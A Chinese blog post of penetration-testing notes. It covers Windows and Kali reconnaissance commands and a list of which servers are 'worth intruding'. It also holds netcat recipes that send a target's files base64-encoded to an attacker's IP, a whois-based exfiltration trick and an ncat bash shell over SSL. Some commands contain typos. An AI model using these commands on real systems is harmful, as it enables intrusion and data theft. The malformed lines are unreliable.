1.3 信息搜集工具的使用

有用信息搜集,以及nc使用方法的追加。

信息搜集

本地信息搜集(Windows 命令)

whoami 查看自己身份

whoami /all 获取当前域的信息

ipconfig 获取ip地址信息

ipconfig /all 获取详细的ip地址信息

查询结果:[所在域-计算机名-账户名]

arp -a 查询arp表

echo %PROCESSOR_ARCHITECTURE% 查看CPU架构

systeminfo 查看操作系统信息

wmic product 查看安装的软件

wmic product get name,version 查看安装的软件和版本信息

net user 查看本地用户

net session 查看本地和远程的会话

net view 查看内网的共享情况

net share 查看自己共享了哪些东西


远程信息搜集(Kali 命令)

什么样的服务器有入侵价值?

  1. 有有价值的网站

seo.chinaz.com 查看seo信息,权重,ip访问量

  1. 上面有庞大数据库的服务器

mssql mysql oracle redis…

  1. 性能优秀的服务器

高性能CPU,显卡,硬盘

  1. 保有某些单位机密的服务器

nping --tcp -p 80 --flag syn 2 [目标ip]

测试对方端口是否开放

nc -nvz [目标ip] 1-65535

使用nc查看对方端口是否开放

netdiscover -i [网卡名称] -r 192.168.x.0/24

搜集内网用户的信息

arping [参数] [目标]

使用arp扫描

-i 指定网卡

-c 发包数量

-s 源mac

-S 源ip

nbtscan

使用 netbios 协议进行信息搜集(Windows之间使用)

通过计算机名解析对应ip

whatweb [网址]

初步分析网站结构

nc用法追加

文件传输(常规)

  1. 先启动发送

发送端:nc -l -p [端口号] <文件

接收端:nc [发送端ip] [端口号] >文件

  1. 先启动接收

接收端:nc -l -p [端口号] >文件

发送端:nc [发送端ip] [端口号] <文件

文本传输(加密)

目标机:

cat [目标文件] | base64 | nc -nv [入侵机ip] [端口号] -q 1

入侵机:

nc -l -p [端口号] >文件

文件传输(两台都是Linux且有一方没有nc)

目标机:

whois -h [入侵机ip] -p [端口号] cat [文件] | base64``

入侵机:

nc -l -v- p [端口号] | sed "s/ //g" | base64 -d

加密通信(两台都是Linux)

使用ncat

目标机:

ncat -c bash --all [入侵IP] -vnl [port] --ssl

入侵机:

ncats -nv [目标IP] [port] --ssl

Licensed under CC BY-NC-SA 4.0
已存在于互联网
发表了126篇文章 · 总计210.25k字
萌ICP备20267077号
Powered by ctOS